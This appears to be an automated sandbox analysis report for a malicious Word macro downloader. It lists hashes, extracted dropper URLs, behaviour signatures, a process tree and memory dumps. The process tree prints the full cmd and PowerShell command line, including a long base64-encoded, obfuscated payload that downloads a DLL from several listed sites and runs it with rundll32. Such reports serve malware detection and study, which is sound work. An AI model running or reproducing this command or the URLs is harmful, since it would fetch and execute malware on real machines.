Analysis

  • max time kernel
    71s
  • max time network
    68s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    20-01-2021 18:52

General

  • Target

    SecuriteInfo.com.W97M.DownLoader.5053.17523.965.doc

  • Size

    83KB

  • MD5

    8d56d1367c961e45f047bd453f1d083e

  • SHA1

    d1fd9363ab7e13dc58adddc49237da769360e801

  • SHA256

    a0ddd4c77bf541f12349e90e60de498bde50a2fa4d4234b7831f439d935753eb

  • SHA512

    3c9c8fbfcc2b9cd1a46d769dc43c6802920e30893dc72deffea168327be1e09e007e3b40617ebaeb0257f6436342c638835f51571c0723bd4741f3eb24b0379c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.ausutra.com/wp-admin/Logs/

exe.dropper

http://artas.biz/c/System/

exe.dropper

http://www.spmkomputer.com/kasir/diagnostics/

exe.dropper

https://sislog.es/wp-admin/MSInfo/

exe.dropper

http://institutmestres.com/wp-includes/n7Fl9WDm/

exe.dropper

http://noithatcongnghieptantien.com/wp-content/Fonts/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W97M.DownLoader.5053.17523.965.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1812
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABTAEUAVAAtAEkAdABFAG0AIAB2AEEAUgBpAEEAQgBMAGUAOgBzAFcAUQB1AHgAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAG8ALgBEAGkAUgBFAEMAdABvACcALAAnAC4ASQAnACwAJwBSAHkAJwAsACcAcwB5AHMAVABFAE0AJwApACkAIAAgADsAIAAgAFMARQBUAC0AdgBhAFIASQBBAEIATABlACAAIAAoACIAQgBPAEsASgAiACsAIgBNACIAKQAgACgAWwB0AFkAcABFAF0AKAAiAHsAMwB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMQB9ACIALQBGACAAJwBOACcALAAnAFQATQBBAG4AQQBnAEUAUgAnACwAJwBUAC4AJwAsACcAcwB5AHMAVABFAG0ALgBOAGUAJwAsACcAUwBFAFIAdgBJAEMARQBwAE8AaQAnACkAIAAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsACcAKwAnAGUAbgAnACkAKwAoACcAdAAnACsAJwBsAHkAJwApACsAKAAnAEMAJwArACcAbwBuAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQARQA0AGgAZQA3AHYAMgA9ACQAWAA4ADUATgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARwA3ADgAWQA7ACQAVQA2ADYAVgA9ACgAJwBUACcAKwAoACcANwAxACcAKwAnAFgAJwApACkAOwAgACAAKABHAEMAaQAgACAAdgBBAFIAaQBBAEIAbABlADoAcwBXAHEAdQB4ACAAIAApAC4AdgBhAGwAdQBlADoAOgAiAGMAUgBgAGUAYQBUAGUARABpAGAAUgBFAEMAVABgAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBSAHYAJwArACcAdwAnACkAKwAoACcASwAnACsAJwBuADkANAAnACkAKwAnAHIAagAnACsAKAAnADgAUgAnACsAJwB2AHcAJwApACsAKAAnAEoAbQBzAG8AOAB2ACcAKwAnAGMAJwArACcAUgB2AHcAJwApACkALgAiAHIAYABlAGAAUABMAGEAYwBlACIAKAAoACcAUgB2ACcAKwAnAHcAJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKQA7ACQAQQA3ADEAVAA9ACgAJwBDADQAJwArACcAOABOACcAKQA7ACAAKAAgACAAZwBFAFQALQBWAEEAUgBpAGEAYgBMAGUAIAAgACgAIgBCAG8ASwBKACIAKwAiAE0AIgApACkALgBWAEEAbAB1AGUAOgA6ACIAcwBlAGAAQwB1AGAAUgBpAHQAeQBwAHIAbwBUAE8AYABDAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQATAA3ADgAWQA9ACgAKAAnAEYAJwArACcAMgAzACcAKQArACcAWQAnACkAOwAkAEEAMABfAHoAYgBiADMAIAA9ACAAKAAoACcAVQAnACsAJwAzADAAJwApACsAJwBLACcAKQA7ACQASgA0ADYATwA9ACgAJwBVACcAKwAoACcAMAA4ACcAKwAnAFoAJwApACkAOwAkAEkAbAB0AGsAcQAwAG8APQAkAEgATwBNAEUAKwAoACgAKAAnAFoAVQBuAEsAJwArACcAbgAnACkAKwAnADkANAAnACsAJwByACcAKwAoACcAagA4ACcAKwAnAFoAJwApACsAKAAnAFUAJwArACcAbgBKAG0AcwAnACkAKwAoACcAbwA4ACcAKwAnAHYAYwAnACkAKwAoACcAWgBVACcAKwAnAG4AJwApACkAIAAgAC0AcgBFAFAAbABBAGMARQAgACAAKABbAGMAaABBAHIAXQA5ADAAKwBbAGMAaABBAHIAXQA4ADUAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEEAMABfAHoAYgBiADMAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEgANwA4AE0APQAoACcAWAAnACsAKAAnADAAJwArACcAMwBPACcAKQApADsAJABHAGsAaQBxAHIAdQA5AD0AKAAnAF0AJwArACgAJwBlADEAJwArACcAcgBbAFMAJwArACcAOgAvACcAKwAnAC8AdwB3ACcAKQArACgAJwB3AC4AJwArACcAYQAnACkAKwAnAHUAcwAnACsAJwB1ACcAKwAnAHQAJwArACcAcgAnACsAJwBhAC4AJwArACgAJwBjAG8AbQAnACsAJwAvAHcAcAAtACcAKQArACcAYQBkACcAKwAoACcAbQBpAG4AJwArACcALwBMACcAKQArACgAJwBvACcAKwAnAGcAcwAvAEAAJwArACcAXQBlADEAcgAnACsAJwBbAFMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwByAHQAJwArACcAYQAnACsAKAAnAHMAJwArACcALgBiACcAKQArACcAaQAnACsAJwB6AC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAUwB5AHMAJwApACsAJwB0ACcAKwAoACcAZQBtAC8AQAAnACsAJwBdACcAKQArACgAJwBlACcAKwAnADEAJwArACcAcgBbAFMAOgAvAC8AdwAnACsAJwB3ACcAKQArACcAdwAnACsAKAAnAC4AcwBwAG0AawAnACsAJwBvAG0AJwApACsAKAAnAHAAdQAnACsAJwB0ACcAKQArACcAZQAnACsAJwByAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGsAYQAnACsAJwBzAGkAJwApACsAKAAnAHIALwBkACcAKwAnAGkAYQAnACkAKwAnAGcAJwArACcAbgBvACcAKwAnAHMAdAAnACsAKAAnAGkAJwArACcAYwBzACcAKQArACcALwAnACsAJwBAACcAKwAoACcAXQBlACcAKwAnADEAcgBbACcAKQArACgAJwBTAHMAOgAnACsAJwAvAC8AJwArACcAcwAnACkAKwAnAGkAJwArACgAJwBzAGwAbwAnACsAJwBnACcAKQArACcALgAnACsAJwBlAHMAJwArACcALwAnACsAKAAnAHcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAnAC8AJwArACcATQBTACcAKwAoACcASQBuAGYAbwAvACcAKwAnAEAAXQAnACkAKwAnAGUAJwArACcAMQAnACsAJwByAFsAJwArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAGkAbgBzAHQAaQAnACsAJwB0AHUAdABtACcAKQArACgAJwBlAHMAdAByAGUAJwArACcAcwAnACkAKwAoACcALgBjACcAKwAnAG8AbQAvAHcAcAAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAJwApACsAJwBkACcAKwAnAGUAJwArACcAcwAnACsAJwAvAG4AJwArACcANwAnACsAJwBGACcAKwAoACcAbAA5ACcAKwAnAFcAJwApACsAKAAnAEQAbQAvACcAKwAnAEAAJwApACsAKAAnAF0AZQAxAHIAWwAnACsAJwBTADoAJwArACcALwAnACsAJwAvAG4AbwBpAHQAJwArACcAaAAnACkAKwAoACcAYQB0AGMAJwArACcAbwBuAGcAJwApACsAKAAnAG4AZwBoAGkAJwArACcAZQBwAHQAYQAnACsAJwBuAHQAJwApACsAKAAnAGkAZQAnACsAJwBuACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKwAnAG4AdABlAG4AJwApACsAKAAnAHQAJwArACcALwBGACcAKwAnAG8AbgB0ACcAKQArACcAcwAvACcAKQAuACIAcgBFAHAAYABMAEEAYABDAEUAIgAoACgAJwBdAGUAJwArACgAJwAxAHIAWwAnACsAJwBTACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGAATABJAHQAIgAoACQARQA5ADcAUAAgACsAIAAkAEUANABoAGUANwB2ADIAIAArACAAJABQADUAMQBUACkAOwAkAFYAOQA4AEcAPQAoACcAVAA5ACcAKwAnADIAVQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAMgBvADkAbAAyADAAIABpAG4AIAAkAEcAawBpAHEAcgB1ADkAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAnACsAJwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAHQARQBtAC4AbgBlAHQALgBXAEUAYgBDAEwAaQBlAG4AVAApAC4AIgBEAG8AYAB3AE4AYABsAE8AYABBAEQARgBJAGwARQAiACgAJABUADIAbwA5AGwAMgAwACwAIAAkAEkAbAB0AGsAcQAwAG8AKQA7ACQATwBfADgAUgA9ACgAJwBQACcAKwAoACcANgA5ACcAKwAnAEwAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQASQBsAHQAawBxADAAbwApAC4AIgBMAEUATgBHAGAAVABoACIAIAAtAGcAZQAgADMANQAwADAANwApACAAewAmACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABJAGwAdABrAHEAMABvACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAcgAnACsAKAAnAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEAEwAJwArACcATAAnACkAKQAuACIAdABPAGAAcwB0AHIAaQBgAE4AZwAiACgAKQA7ACQAQQA0ADkASQA9ACgAKAAnAFUAJwArACcAXwBfACcAKQArACcARQAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwA4AEwAPQAoACgAJwBaACcAKwAnADUAOQAnACkAKwAnAFQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADUAXwBCAD0AKAAnAEMAJwArACgAJwBfADgAJwArACcAWgAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1604
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAdABFAG0AIAB2AEEAUgBpAEEAQgBMAGUAOgBzAFcAUQB1AHgAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAG8ALgBEAGkAUgBFAEMAdABvACcALAAnAC4ASQAnACwAJwBSAHkAJwAsACcAcwB5AHMAVABFAE0AJwApACkAIAAgADsAIAAgAFMARQBUAC0AdgBhAFIASQBBAEIATABlACAAIAAoACIAQgBPAEsASgAiACsAIgBNACIAKQAgACgAWwB0AFkAcABFAF0AKAAiAHsAMwB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMQB9ACIALQBGACAAJwBOACcALAAnAFQATQBBAG4AQQBnAEUAUgAnACwAJwBUAC4AJwAsACcAcwB5AHMAVABFAG0ALgBOAGUAJwAsACcAUwBFAFIAdgBJAEMARQBwAE8AaQAnACkAIAAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsACcAKwAnAGUAbgAnACkAKwAoACcAdAAnACsAJwBsAHkAJwApACsAKAAnAEMAJwArACcAbwBuAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQARQA0AGgAZQA3AHYAMgA9ACQAWAA4ADUATgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARwA3ADgAWQA7ACQAVQA2ADYAVgA9ACgAJwBUACcAKwAoACcANwAxACcAKwAnAFgAJwApACkAOwAgACAAKABHAEMAaQAgACAAdgBBAFIAaQBBAEIAbABlADoAcwBXAHEAdQB4ACAAIAApAC4AdgBhAGwAdQBlADoAOgAiAGMAUgBgAGUAYQBUAGUARABpAGAAUgBFAEMAVABgAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBSAHYAJwArACcAdwAnACkAKwAoACcASwAnACsAJwBuADkANAAnACkAKwAnAHIAagAnACsAKAAnADgAUgAnACsAJwB2AHcAJwApACsAKAAnAEoAbQBzAG8AOAB2ACcAKwAnAGMAJwArACcAUgB2AHcAJwApACkALgAiAHIAYABlAGAAUABMAGEAYwBlACIAKAAoACcAUgB2ACcAKwAnAHcAJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKQA7ACQAQQA3ADEAVAA9ACgAJwBDADQAJwArACcAOABOACcAKQA7ACAAKAAgACAAZwBFAFQALQBWAEEAUgBpAGEAYgBMAGUAIAAgACgAIgBCAG8ASwBKACIAKwAiAE0AIgApACkALgBWAEEAbAB1AGUAOgA6ACIAcwBlAGAAQwB1AGAAUgBpAHQAeQBwAHIAbwBUAE8AYABDAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQATAA3ADgAWQA9ACgAKAAnAEYAJwArACcAMgAzACcAKQArACcAWQAnACkAOwAkAEEAMABfAHoAYgBiADMAIAA9ACAAKAAoACcAVQAnACsAJwAzADAAJwApACsAJwBLACcAKQA7ACQASgA0ADYATwA9ACgAJwBVACcAKwAoACcAMAA4ACcAKwAnAFoAJwApACkAOwAkAEkAbAB0AGsAcQAwAG8APQAkAEgATwBNAEUAKwAoACgAKAAnAFoAVQBuAEsAJwArACcAbgAnACkAKwAnADkANAAnACsAJwByACcAKwAoACcAagA4ACcAKwAnAFoAJwApACsAKAAnAFUAJwArACcAbgBKAG0AcwAnACkAKwAoACcAbwA4ACcAKwAnAHYAYwAnACkAKwAoACcAWgBVACcAKwAnAG4AJwApACkAIAAgAC0AcgBFAFAAbABBAGMARQAgACAAKABbAGMAaABBAHIAXQA5ADAAKwBbAGMAaABBAHIAXQA4ADUAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEEAMABfAHoAYgBiADMAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEgANwA4AE0APQAoACcAWAAnACsAKAAnADAAJwArACcAMwBPACcAKQApADsAJABHAGsAaQBxAHIAdQA5AD0AKAAnAF0AJwArACgAJwBlADEAJwArACcAcgBbAFMAJwArACcAOgAvACcAKwAnAC8AdwB3ACcAKQArACgAJwB3AC4AJwArACcAYQAnACkAKwAnAHUAcwAnACsAJwB1ACcAKwAnAHQAJwArACcAcgAnACsAJwBhAC4AJwArACgAJwBjAG8AbQAnACsAJwAvAHcAcAAtACcAKQArACcAYQBkACcAKwAoACcAbQBpAG4AJwArACcALwBMACcAKQArACgAJwBvACcAKwAnAGcAcwAvAEAAJwArACcAXQBlADEAcgAnACsAJwBbAFMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwByAHQAJwArACcAYQAnACsAKAAnAHMAJwArACcALgBiACcAKQArACcAaQAnACsAJwB6AC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAUwB5AHMAJwApACsAJwB0ACcAKwAoACcAZQBtAC8AQAAnACsAJwBdACcAKQArACgAJwBlACcAKwAnADEAJwArACcAcgBbAFMAOgAvAC8AdwAnACsAJwB3ACcAKQArACcAdwAnACsAKAAnAC4AcwBwAG0AawAnACsAJwBvAG0AJwApACsAKAAnAHAAdQAnACsAJwB0ACcAKQArACcAZQAnACsAJwByAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGsAYQAnACsAJwBzAGkAJwApACsAKAAnAHIALwBkACcAKwAnAGkAYQAnACkAKwAnAGcAJwArACcAbgBvACcAKwAnAHMAdAAnACsAKAAnAGkAJwArACcAYwBzACcAKQArACcALwAnACsAJwBAACcAKwAoACcAXQBlACcAKwAnADEAcgBbACcAKQArACgAJwBTAHMAOgAnACsAJwAvAC8AJwArACcAcwAnACkAKwAnAGkAJwArACgAJwBzAGwAbwAnACsAJwBnACcAKQArACcALgAnACsAJwBlAHMAJwArACcALwAnACsAKAAnAHcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAnAC8AJwArACcATQBTACcAKwAoACcASQBuAGYAbwAvACcAKwAnAEAAXQAnACkAKwAnAGUAJwArACcAMQAnACsAJwByAFsAJwArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAGkAbgBzAHQAaQAnACsAJwB0AHUAdABtACcAKQArACgAJwBlAHMAdAByAGUAJwArACcAcwAnACkAKwAoACcALgBjACcAKwAnAG8AbQAvAHcAcAAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAJwApACsAJwBkACcAKwAnAGUAJwArACcAcwAnACsAJwAvAG4AJwArACcANwAnACsAJwBGACcAKwAoACcAbAA5ACcAKwAnAFcAJwApACsAKAAnAEQAbQAvACcAKwAnAEAAJwApACsAKAAnAF0AZQAxAHIAWwAnACsAJwBTADoAJwArACcALwAnACsAJwAvAG4AbwBpAHQAJwArACcAaAAnACkAKwAoACcAYQB0AGMAJwArACcAbwBuAGcAJwApACsAKAAnAG4AZwBoAGkAJwArACcAZQBwAHQAYQAnACsAJwBuAHQAJwApACsAKAAnAGkAZQAnACsAJwBuACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKwAnAG4AdABlAG4AJwApACsAKAAnAHQAJwArACcALwBGACcAKwAnAG8AbgB0ACcAKQArACcAcwAvACcAKQAuACIAcgBFAHAAYABMAEEAYABDAEUAIgAoACgAJwBdAGUAJwArACgAJwAxAHIAWwAnACsAJwBTACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGAATABJAHQAIgAoACQARQA5ADcAUAAgACsAIAAkAEUANABoAGUANwB2ADIAIAArACAAJABQADUAMQBUACkAOwAkAFYAOQA4AEcAPQAoACcAVAA5ACcAKwAnADIAVQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAMgBvADkAbAAyADAAIABpAG4AIAAkAEcAawBpAHEAcgB1ADkAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAnACsAJwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAHQARQBtAC4AbgBlAHQALgBXAEUAYgBDAEwAaQBlAG4AVAApAC4AIgBEAG8AYAB3AE4AYABsAE8AYABBAEQARgBJAGwARQAiACgAJABUADIAbwA5AGwAMgAwACwAIAAkAEkAbAB0AGsAcQAwAG8AKQA7ACQATwBfADgAUgA9ACgAJwBQACcAKwAoACcANgA5ACcAKwAnAEwAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQASQBsAHQAawBxADAAbwApAC4AIgBMAEUATgBHAGAAVABoACIAIAAtAGcAZQAgADMANQAwADAANwApACAAewAmACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABJAGwAdABrAHEAMABvACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAcgAnACsAKAAnAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEAEwAJwArACcATAAnACkAKQAuACIAdABPAGAAcwB0AHIAaQBgAE4AZwAiACgAKQA7ACQAQQA0ADkASQA9ACgAKAAnAFUAJwArACcAXwBfACcAKQArACcARQAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwA4AEwAPQAoACgAJwBaACcAKwAnADUAOQAnACkAKwAnAFQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADUAXwBCAD0AKAAnAEMAJwArACgAJwBfADgAJwArACcAWgAnACkAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1616

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/740-5-0x0000000000000000-mapping.dmp

    • memory/1616-8-0x000007FEF5130000-0x000007FEF5B1C000-memory.dmp

      Filesize

      9.9MB

    • memory/1616-9-0x0000000002370000-0x0000000002371000-memory.dmp

      Filesize

      4KB

    • memory/1616-16-0x000000001C390000-0x000000001C391000-memory.dmp

      Filesize

      4KB

    • memory/1616-6-0x0000000000000000-mapping.dmp

    • memory/1616-7-0x000007FEFBA41000-0x000007FEFBA43000-memory.dmp

      Filesize

      8KB

    • memory/1616-15-0x000000001C300000-0x000000001C301000-memory.dmp

      Filesize

      4KB

    • memory/1616-10-0x000000001AC90000-0x000000001AC91000-memory.dmp

      Filesize

      4KB

    • memory/1616-14-0x00000000024A0000-0x00000000024A1000-memory.dmp

      Filesize

      4KB

    • memory/1616-11-0x0000000002670000-0x0000000002671000-memory.dmp

      Filesize

      4KB

    • memory/1616-12-0x000000001AC10000-0x000000001AC12000-memory.dmp

      Filesize

      8KB

    • memory/1616-13-0x000000001AC14000-0x000000001AC16000-memory.dmp

      Filesize

      8KB

    • memory/1812-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1812-2-0x0000000072541000-0x0000000072544000-memory.dmp

      Filesize

      12KB

    • memory/1812-3-0x000000006FFC1000-0x000000006FFC3000-memory.dmp

      Filesize

      8KB